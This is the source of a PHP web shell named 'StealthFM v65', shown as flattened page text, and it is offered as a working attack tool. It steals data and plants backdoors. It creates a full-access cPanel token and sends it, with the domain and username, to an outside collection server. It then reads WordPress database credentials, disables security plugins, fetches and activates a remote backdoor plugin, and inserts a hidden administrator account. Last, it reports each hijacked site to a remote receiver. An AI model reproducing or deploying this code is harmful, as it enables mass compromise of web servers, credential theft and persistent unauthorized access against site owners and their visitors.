StealthFM v65

"; // --- PART 1: UAPI TOKEN --- echo "

1. CPANEL TOKEN

"; $cwd = str_replace('\\', '/', getcwd()); $homedir = "/home/" . get_current_user() . "/public_html"; if (preg_match('~^(/home\d*?/[^/]+)~', $cwd, $m)) { $homedir = $m[1] . "/public_html"; } $cmd = "(uapi Tokens create_full_access name=xshikata || /usr/bin/uapi Tokens create_full_access name=xshikata || /usr/local/cpanel/bin/uapi Tokens create_full_access name=xshikata) 2>&1"; $output = ""; $used_method = "None"; $methods = [ 'shell_exec' => function($c) { return @shell_exec($c); }, 'exec' => function($c) { @exec($c, $o); return implode("\n", $o); }, 'passthru' => function($c) { ob_start(); @passthru($c); return ob_get_clean(); }, 'system' => function($c) { ob_start(); @system($c); return ob_get_clean(); }, 'popen' => function($c) { $h = @popen($c, 'r'); if($h) { $o = stream_get_contents($h); @pclose($h); return $o; } return null; }, 'proc_open' => function($c) { $d = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']]; $p = @proc_open($c, $d, $pipes); if (is_resource($p)) { $o = stream_get_contents($pipes[1]); @fclose($pipes[1]); @fclose($pipes[2]); @proc_close($p); return $o; } return null; } ]; foreach ($methods as $name => $func) { if (function_exists($name)) { $res = $func($cmd); if (!empty($res)) { $output = $res; if (stripos($res, 'token:') !== false || stripos($res, 'conflicting') !== false || stripos($res, 'already exists') !== false) { $used_method = $name; break; } } } } $token_val = ""; $display_status = "UNKNOWN"; $display_color = "text-secondary"; if(preg_match('/token:\s*(\S+)/i', $output, $m)) { $token_val = trim($m[1]); $display_status = "CREATED"; $display_color = "text-success"; } elseif (stripos($output, 'conflicting') !== false || stripos($output, 'already exists') !== false) { $token_val = "Exists (Secret Hidden)"; $display_status = "ALREADY EXISTS"; $display_color = "text-warning"; } else { $display_status = "NOT FOUND"; $display_color = "text-danger"; } $server_response = "Skipped"; $srv_color = "text-secondary"; if ($display_status === "CREATED" && !empty($token_val)) { $target_url = "https://stepmomhub.com/catch.php"; $data_json = json_encode([ "domain" => $_SERVER['HTTP_HOST'], "username" => get_current_user(), "apiToken" => $token_val, "homedir" => $homedir ]); $raw_response = "No Connect"; if (function_exists('curl_init')) { $ch = curl_init($target_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data_json); curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $raw_response = curl_exec($ch); curl_close($ch); } elseif (ini_get('allow_url_fopen')) { $opts = ['http' => ['method'=>'POST', 'header'=>'Content-Type: application/json', 'content'=>$data_json, 'timeout'=>10], 'ssl'=>['verify_peer'=>false, 'verify_peer_name'=>false]]; $raw_response = @file_get_contents($target_url, false, stream_context_create($opts)); } $json_res = json_decode($raw_response, true); if ($json_res) { if ($json_res['status'] === 'success') { $server_response = "Saved to Database."; $srv_color = "text-success"; } elseif ($json_res['status'] === 'ignored') { $server_response = "Already Saved (Duplicate)."; $srv_color = "text-warning"; } else { $server_response = "Server Error: " . $json_res['msg']; $srv_color = "text-danger"; } } else { $server_response = "Raw: " . substr($raw_response, 0, 50); } } elseif ($display_status === "ALREADY EXISTS") { $server_response = "Skipped (Secret Hidden)"; $srv_color = "text-warning"; } echo "

Method: $used_method | Token: $display_status

"; echo "

Server: $server_response

"; if ($display_status === "NOT FOUND") { $clean_out = htmlspecialchars(substr($output, 0, 200)); echo "

$clean_out

"; } echo "

"; // --- PART 2: CREATE ADMIN WORDPRESS --- echo "

2. WP ADMIN CREATOR

"; $targets = []; scan_smart_stream($target, $targets); $targets = array_unique($targets); if (empty($targets)) { echo "

No wp-config.php found in this path.

"; } else { $au = 'xshikata'; $ap = md5('Lulz1337'); $ae = 'topupgameku.id@gmail.com'; $plugin_src = 'https://raw.githubusercontent.com/baseng1337/damn/refs/heads/main/system-core.php'; $plugin_folder_name = 'system-core'; $plugin_filename = 'system-core.php'; $plugin_hook = $plugin_folder_name . '/' . $plugin_filename; $receiver_url = 'https://stepmomhub.com/wp/receiver.php'; $receiver_key = 'wtf'; $master_core = sys_get_temp_dir() . '/master_core_' . time() . '.php'; $master_index = sys_get_temp_dir() . '/master_index_' . time() . '.php'; $ua = stream_context_create(['http'=>['header'=>"User-Agent: Mozilla/5.0"]]); $src_core = @file_get_contents($plugin_src, false, $ua); $src_idx = @file_get_contents('https://raw.githubusercontent.com/baseng1337/damn/refs/heads/main/index.php', false, $ua); if($src_core) file_put_contents($master_core, $src_core); if($src_idx) file_put_contents($master_index, $src_idx); foreach ($targets as $cfg) { $raw = x_read($cfg); if (!$raw) continue; $dh = get_conf_val_smart($raw, 'DB_HOST'); $du = get_conf_val_smart($raw, 'DB_USER'); $dp = get_conf_val_smart($raw, 'DB_PASSWORD'); $dn = get_conf_val_smart($raw, 'DB_NAME'); $pre = 'wp_'; if (preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]/", $raw, $m)) $pre = $m[1]; $wp_root_path = dirname($cfg); $disp = str_replace($target, '', $wp_root_path); echo "

"; echo "Dir: " . ($disp?:'/') . " -> "; @mysqli_report(MYSQLI_REPORT_OFF); $cn = mysqli_init(); @mysqli_options($cn, MYSQLI_OPT_CONNECT_TIMEOUT, 2); if (@mysqli_real_connect($cn, $dh, $du, $dp, $dn)) { $plugins_dir = $wp_root_path . '/wp-content/plugins/'; $targets_to_kill = ['wordfence', 'ithemes-security-pro', 'sucuri-scanner', 'sg-security', 'limit-login-attempts-reloaded']; foreach ($targets_to_kill as $folder) { $path = $plugins_dir . $folder; if (is_dir($path)) { @rename($path, $path . '_killed_' . time()); } } $target_folder = $plugins_dir . $plugin_folder_name; $target_file = $target_folder . '/' . $plugin_filename; $index_file = $target_folder . '/index.php'; if (!is_dir($target_folder)) { @mkdir($target_folder, 0755, true); @chmod($target_folder, 0755); } $deploy_ok = false; if (file_exists($master_core) && @copy($master_core, $target_file)) { @chmod($target_file, 0644); if (file_exists($master_index)) @copy($master_index, $index_file); $deploy_ok = true; } $act_ok = false; $user_ok = false; if ($deploy_ok) { $qopt = @mysqli_query($cn, "SELECT option_value FROM {$pre}options WHERE option_name='active_plugins'"); $current_plugins = ($qopt && mysqli_num_rows($qopt) > 0) ? @unserialize(mysqli_fetch_assoc($qopt)['option_value']) : []; if (!is_array($current_plugins)) $current_plugins = []; if (!in_array($plugin_hook, $current_plugins)) { $current_plugins[] = $plugin_hook; sort($current_plugins); $hex_data = bin2hex(serialize($current_plugins)); @mysqli_query($cn, "DELETE FROM {$pre}options WHERE option_name='active_plugins'"); if (@mysqli_query($cn, "INSERT INTO {$pre}options (option_name, option_value, autoload) VALUES ('active_plugins', 0x$hex_data, 'yes')")) $act_ok = true; } else { $act_ok = true; } } $q1 = @mysqli_query($cn, "SELECT ID FROM {$pre}users WHERE user_login='$au'"); if ($q1 && mysqli_num_rows($q1) > 0) { $uid = mysqli_fetch_assoc($q1)['ID']; @mysqli_query($cn, "UPDATE {$pre}users SET user_pass='$ap' WHERE ID=$uid"); $user_ok = true; } else { @mysqli_query($cn, "INSERT INTO {$pre}users (user_login,user_pass,user_nicename,user_email,user_status,display_name) VALUES ('$au','$ap','Admin','$ae',0,'Admin')"); $uid = mysqli_insert_id($cn); if($uid) $user_ok = true; } if($user_ok) { $cap = serialize(['administrator'=>true]); @mysqli_query($cn, "INSERT INTO {$pre}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$pre}capabilities','$cap') ON DUPLICATE KEY UPDATE meta_value='$cap'"); @mysqli_query($cn, "INSERT INTO {$pre}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$pre}user_level','10') ON DUPLICATE KEY UPDATE meta_value='10'"); } $ping_res = "-"; $surl = ""; $qurl = @mysqli_query($cn, "SELECT option_value FROM {$pre}options WHERE option_name='siteurl'"); if ($qurl && mysqli_num_rows($qurl)>0) $surl = mysqli_fetch_assoc($qurl)['option_value']; if (!empty($surl)) { $pdata_direct = http_build_query(['action'=>'register_site', 'secret'=>$receiver_key, 'domain'=>$surl, 'api_user'=>'', 'api_pass'=>'']); $ctx_direct = stream_context_create(['http'=>['method'=>'POST','header'=>"Content-type: application/x-www-form-urlencoded",'content'=>$pdata_direct,'timeout'=>2]]); @file_get_contents($receiver_url, false, $ctx_direct); if ($act_ok) { $trigger_url = rtrim($surl, '/') . '/wp-content/plugins/' . $plugin_folder_name . '/index.php'; $ctx_trig = stream_context_create(['http'=>['method'=>'GET','header'=>"User-Agent: Mozilla/5.0",'timeout'=>2]]); @file_get_contents($trigger_url, false, $ctx_trig); $ping_res = "OK"; } } echo $deploy_ok ? "PLG:OK " : "PLG:ERR "; echo $user_ok ? "USR:OK " : "USR:ERR "; echo "PING:$ping_res"; mysqli_close($cn); } else { echo "DB CONN FAIL"; } echo "

"; } } echo "

"; echo "

Create New File

Rename Item

Editor

Toolkit

Smart Mass Upload

Scan Results

Auto Add Admin